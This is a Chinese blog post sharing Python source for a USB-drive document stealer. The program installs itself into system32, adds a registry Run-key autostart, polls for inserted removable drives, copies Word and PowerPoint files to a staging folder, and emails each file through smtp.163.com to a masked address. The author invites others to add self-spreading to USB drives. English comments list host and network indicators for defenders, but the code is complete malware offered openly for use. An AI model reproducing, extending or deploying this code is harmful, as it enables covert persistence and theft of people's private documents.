U盘资料窃取(复制+开机启动+后台发送)

原本是想制作一个类似于U盘木马的东东。目前用户运行程序后,它能把自身复制到电脑并设置开机启动,随时监控U盘,自动把U盘里的资料复制到电脑上,再在后台发送给自己。还想实现的功能有:最好可以自动感染到U盘中,以后U盘再插入其他电脑时,可以继续复制


写得非常粗糙,有感兴趣的,大家可以一起完成,私信我

# -*- coding: cp936 -*-
#foolyc CSDN博客:http://blog.csdn.net/foolyc
#博客园:http://www.cnblogs.com/foolyc/
import win32file
import shutil
import os
import time
import _winreg
import subprocess

import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart


def addtoautorun():
    # Persistence step: modifies the registry so the program starts at boot.
    # Opens HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    # with KEY_WRITE and sets a REG_SZ value named "UDiskBee" whose data is
    # the path C:/WINDOWS/system32/UDiskBee.exe.
    #
    # Defender notes:
    # - Host indicators visible here: the Run-key value name "UDiskBee" and
    #   the executable path under system32. Registry auditing or an
    #   autostart inventory of this key will show the new value.
    # - Writing under HKEY_LOCAL_MACHINE normally requires administrator
    #   rights, so a standard (non-admin) user session limits this step.
    key=_winreg.OpenKey(_winreg.HKEY_LOCAL_MACHINE,r'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0,_winreg.KEY_WRITE)
    _winreg.SetValueEx(key,"UDiskBee",0,_winreg.REG_SZ,r'C:/WINDOWS/system32/UDiskBee.exe')
def getremovabledisk():
    # Returns a list of drive root strings (e.g. "E:\\") for volumes that
    # are currently present, report drive type 2, and whose total size is
    # below the threshold checked further down.
    drives=[]
    # Bitmask of logical drives; bit i is tested against drive_all[i].
    sign=win32file.GetLogicalDrives()
    drive_all=["A:\\","B:\\","C:\\","D:\\","E:\\","F:\\","G:\\","H:\\","I:\\",
                "J:\\","K:\\","L:\\","M:\\","N:\\","O:\\","P:\\","Q:\\","R:\\",
                "S:\\","T:\\","U:\\","V:\\","W:\\","X:\\","Y:\\","Z:\\"]
    for i in range(25):
        if (sign&1<<i):
            # 2 is the Win32 DRIVE_REMOVABLE drive type.
            if win32file.GetDriveType(drive_all[i])==2:
                free_bytes,total_bytes,total_free_bytes=win32file.GetDiskFreeSpaceEx(drive_all[i])
                # Only volumes whose total size, divided down to GiB,
                # is below 17 are kept.
                if (total_bytes/1024/1024/1024)<17:
                    drives.append(drive_all[i])
    return drives

def copyfile(drives):
    # Collection/staging step: walks every drive root in `drives` and copies
    # files whose extension equals one of the literals in the condition
    # below into a timestamped folder under D:/foolbak/.
    #
    # Defender notes:
    # - Host indicators visible here: the staging directory D:/foolbak/ and
    #   its subfolders named with a %Y%m%d%H%M timestamp.
    # - The behaviour to look for is a recursive read of a newly mounted
    #   removable volume followed by document copies onto a fixed disk.
    #   Endpoint file-activity monitoring and removable-media policy are
    #   the relevant controls.
    target_dir='D:/foolbak/'
    if not os.path.exists(target_dir):
        os.makedirs(target_dir)  
    # One staging folder per run, named by minute-resolution local time.
    today=target_dir+time.strftime('%Y%m%d%H%M')+'/'
    if not os.path.exists(today):
        os.makedirs(today)    
    for udisk in drives:
        for root, dirs, files in os.walk(udisk):
            for one in files:
                # NOTE(review): `type` shadows the builtin of the same name.
                type = os.path.splitext(one)[1]
                if type == ".ppt" or type == ".pptx" or type == ".doc" or type == "docx" :
                    # root[3:] drops the first three characters of the walk
                    # path (the drive root such as "E:\") so the source
                    # folder layout is mirrored under `today`.
                    if len(root)>3 and not os.path.exists(today+root[3:]):
                        os.makedirs(today+root[3:])
                    shutil.copy(root+'/'+one,today+root[3:]+'/'+one)

def sendfile(filepath):
    # Exfiltration step: sends the file at `filepath` as an e-mail
    # attachment through smtp.163.com. The sender, recipient and login
    # values are masked ('**') on the page.
    #
    # Defender notes:
    # - Network indicator visible here: an outbound SMTP session from the
    #   endpoint to smtp.163.com, authenticated with a mailbox account.
    # - Blocking direct outbound SMTP from workstations (allowing mail only
    #   through the organisation's relay) stops this channel. Egress logs
    #   showing an endpoint talking SMTP to an external provider are the
    #   detection point.
    from_mail='**@163.com'
    to_mail='**@qq.com'
    msg=MIMEMultipart()
    msg['From']=from_mail
    msg['To']=to_mail
    msg['Subject']='subject'
    # The file content is wrapped in a MIMEText part declared as base64 with
    # charset gb2312, then relabelled as application/octet-stream.
    content=MIMEText(open(filepath, 'r').read(), 'base64', 'gb2312')
    content["Content-Type"] = 'application/octet-stream'
    # The attachment filename is the full staging path, not just the basename.
    content.add_header('content-disposition','attachment',filename=filepath)  
    msg.attach(content)
    server=smtplib.SMTP('smtp.163.com')
    server.docmd('ehlo','**@163.com')
    server.login('**@163.com','**')
    server.sendmail(from_mail,to_mail,msg.as_string())
    server.quit()

def sendall():
    # Walks the whole D:/foolbak/ staging tree and calls sendfile() on every
    # file found, sleeping 30 seconds after each one.
    #
    # Defender note: the resulting pattern is a series of SMTP submissions
    # from one host, one attachment per message, spaced about 30 seconds
    # apart.
    for root, dirs, files in os.walk('D:/foolbak/'):
        for one in files:
            tempfile=root+'/'+one
            sendfile(tempfile)
            time.sleep(30)



if __name__=="__main__":
    # Entry point with two modes, selected by whether
    # C:/WINDOWS/system32/UDiskBee.exe already exists.
    #
    # Defender notes:
    # - Install-mode indicators: a new UDiskBee.exe written into system32,
    #   the Run-key value added by addtoautorun(), and a child process
    #   started from that system32 path.
    # - Writing into C:/WINDOWS/system32 normally requires administrator
    #   rights, so running users without admin privileges limits the
    #   install branch.
    if not os.path.isfile('C:/WINDOWS/system32/UDiskBee.exe'):
        # Install mode: copy UDiskBee.exe from the current working directory
        # into system32, register autostart, then launch the installed copy.
        shutil.copy(os.getcwd()+'/'+'UDiskBee.exe','C:/WINDOWS/system32/UDiskBee.exe')
        addtoautorun()
        subprocess.Popen('C:/WINDOWS/system32/UDiskBee.exe')
    else :
        # Monitor mode: poll the removable-drive list every 20 seconds.
        # drives_bk holds the list seen on the previous change.
        drives_bk=[]
        while 1:
            time.sleep(20)
            drives=getremovabledisk()
            if (drives!=drives_bk)&(len(drives_bk)<len(drives)):
                # The list changed and grew: a removable drive was inserted.
                # Stage its documents, then send the staging tree.
                drives_bk=drives
                copyfile(drives)
                sendall()
            if (drives!=drives_bk)&(len(drives_bk)>len(drives)):
                # The list changed and shrank: a drive was removed, so only
                # the remembered list is updated.
                drives_bk=drives
            
            

参考资料:

http://www.cnblogs.com/xiaowuyi/archive/2012/03/17/2404015.html
